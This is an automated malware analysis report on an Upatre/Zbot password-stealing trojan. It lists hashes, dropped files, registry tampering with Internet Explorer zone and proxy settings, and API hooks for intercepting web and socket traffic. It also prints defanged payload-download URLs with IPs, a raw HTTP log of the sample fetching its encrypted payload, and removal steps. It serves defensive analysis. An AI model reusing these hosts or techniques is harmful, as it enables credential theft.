Trojan.GenericKD.1559566 (BitDefender), TrojanDownloader:Win32/Upatre.L (Microsoft), Trojan.Win32.Bublik.bxtq (Kaspersky), Trojan.Win32.Upatre.jr (v) (VIPRE), Trojan.DownLoad3.28161 (DrWeb), Trojan.GenericKD.1559566 (B) (Emsisoft), PWSZbot-FRM (McAfee), Downloader.Upatre (Symantec), Trojan-Downloader.Win32.Upatre (Ikarus), Trojan.GenericKD.1559566 (FSecure), Crypt_s.FLK (AVG), Win32:Trojan-gen (Avast), TROJ_UPATRE.SMBX (TrendMicro), Trojan.GenericKD.1559566 (AdAware), Trojan-PSW.Win32.Zbot.4.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: bbae13fd3099b40b0704e5b341308c1b
SHA1: a52bb7c4c3709e2ef53bf6c4b10935eaf9892e0f
SHA256: 064ec5e33d499b35487ec1384af567e4b88b5bb1c0b60cd2b9c8b344d786b909
SSDeep: 384:uHdZNg Ml2 0fkkzWUHh1DjHXRrs905INeZCFtejlIko5dN127BFVn2p4lAnZ8Oh:Q3NXvkkRfDjHXRrs9sINeZEtejlIkoL7
Size: 20256 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-02-05 06:01:14
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users' passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan-PSW creates the following process(es):
umvaeb.exe:800
%original file name%.exe:160
nomes.exe:392
realupdater.exe:1932
The Trojan-PSW injects its code into the following process(es):
Explorer.EXE:1680
File activity
The process umvaeb.exe:800 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user% (28672 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (17920 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (73728 bytes)
The process %original file name%.exe:160 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\realupdater.exe (20336 bytes)
The process nomes.exe:392 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Xyefq\umvaeb.exe (693248 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SWPB639.bat (173 bytes)
%Documents and Settings%\%current user%\Application Data\Xyefq (4096 bytes)
The process realupdater.exe:1932 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nomes.exe (607232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\pdf[1].enc (289558 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\desktop.ini (67 bytes)
Registry activity
The process umvaeb.exe:800 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 6A 3C F9 EE C9 86 33 8A F3 3B 47 09 E6 27 21"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Xyfoleoknam]
"eaijg70" = "CF 79 D5 92 0E 68 7E 28 48 B5 12 54 EC 9C EA 44"
The process %original file name%.exe:160 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 7B 3C 0D F0 E5 BF 68 20 D9 1A E4 E2 6B 49 29"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Документы"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Рабочий стол"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"realupdater.exe" = "realupdater"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Рабочий стол"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Мои документы"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"
The Trojan-PSW modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW modifies IE security zone settings to map all local web nodes with no dots that do not belong to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process nomes.exe:392 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 34 EC E9 9D 67 E6 26 33 76 8A 35 7A 55 CC DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process realupdater.exe:1932 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Документы"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Мои документы"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Рабочий стол"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Рабочий стол"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"nomes.exe" = "nomes"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 0C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 22 D4 A1 44 23 CD C6 0B 67 6E 20 61 F5 1F 24"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"
The Trojan-PSW modifies IE security zone settings to map all local web nodes with no dots that do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| bd18016f5cfa5694720ca629ceb148a0 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Xyefq\umvaeb.exe |
| 8a3d521f5dc2f89eb204e9d62b4f67fc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\realupdater.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan-PSW installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFile
InternetWriteFileExA
InternetQueryDataAvailable
HttpQueryInfoW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
The Trojan-PSW installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan-PSW installs the following user-mode hooks in USER32.dll:
GetClipboardData
TranslateMessage
The Trojan-PSW installs the following user-mode hooks in Secur32.dll:
DecryptMessage
SealMessage
DeleteSecurityContext
The Trojan-PSW installs the following user-mode hooks in WS2_32.dll:
WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW
The Trojan-PSW installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtCreateThread
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
umvaeb.exe:800
%original file name%.exe:160
nomes.exe:392
realupdater.exe:1932
- Delete the original Trojan-PSW file.
- Delete or disinfect the following files created/modified by the Trojan-PSW:
%Documents and Settings%\%current user% (28672 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (17920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\realupdater.exe (20336 bytes)
%Documents and Settings%\%current user%\Application Data\Xyefq\umvaeb.exe (693248 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SWPB639.bat (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nomes.exe (607232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\pdf[1].enc (289558 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\desktop.ini (67 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 5980 | 6144 | 4.29621 | 18a409c9ee27ba7e2f52c8d5827db0fb |
| .rdata | 12288 | 1142 | 1536 | 2.80053 | 9921719d3029dea6a7daef99a3f5619c |
| .data | 16384 | 260 | 512 | 1.74846 | 92ed38dfa29b35d2ea9541f9024b641a |
| .rsrc | 20480 | 10232 | 10240 | 3.98165 | 320a63c0552666c12f361d403bd803b5 |
| .reloc | 32768 | 316 | 512 | 2.01653 | 5d5037fb65f960eefa0bdd3de33a413b |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://svsmills.com/images/pdf.enc | 182.18.150.53 |
| hxxp://japanrareearths.com/img/pdf.enc | 182.18.146.98 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /img/pdf.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: japanrareearths.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2014 12:35:43 GMT
Server: Apache
Last-Modified: Thu, 06 Feb 2014 07:36:02 GMT
Accept-Ranges: bytes
Content-Length: 289558
Content-Type: text/plain
<<< skipped >>>
GET /images/pdf.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: svsmills.com
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Date: Tue, 11 Mar 2014 12:35:46 GMT
Server: Apache
Content-Length: 331
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /images/pdf.enc was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...
Map
Strings from Dumps
Explorer.EXE_1680_rwx_01EC0000_00048000:
.text
`.data
.idata
@.reloc
Invalid parameter passed to C runtime function.
>$>,>4><>
0123456789
http://www.google.com/
http://www.bing.com/
REPORT
HTTP/1.1
RegDeleteKeyExW
gdiplus.dll
GdiplusShutdown
.TJFZAIY]JD^"
?:527|:!;8
!1 (##!(
Kmv`jn`%fnfnzg,bt3crd~da4
1&,$=OJ-:&#O-
-.ynp<
'2$4>%|903
: 8? 1 !
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
w%fkN
t.Ht$HHt
L$Â$
m9.td
zcÁ
ntdll.dll
KERNEL32.dll
ExitWindowsEx
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
CryptGetKeyParam
CryptImportKey
CryptDestroyKey
RegCreateKeyExW
RegCloseKey
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegFlushKey
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
ole32.dll
GDI32.dll
WS2_32.dll
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXImportCertStore
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpEndRequestA
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
IPHLPAPI.DLL
VERSION.dll
msvcrt.dll
9 9$9(9,9094989
> >$>(>,>0>4>|>
00D0K0_0q0z0
:!:(:,:1:8:^:
\StringFileInfo\xx\%s
urlmon.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
kernel32.dll
launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
shell32.dll
cabinet.dll
Wadvapi32.dll
"%s" %s
/c "%s"
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Local Settings\Application Data
Global\{6D2DABD3-6C4A-40B1-99CD-5691B9DB7583}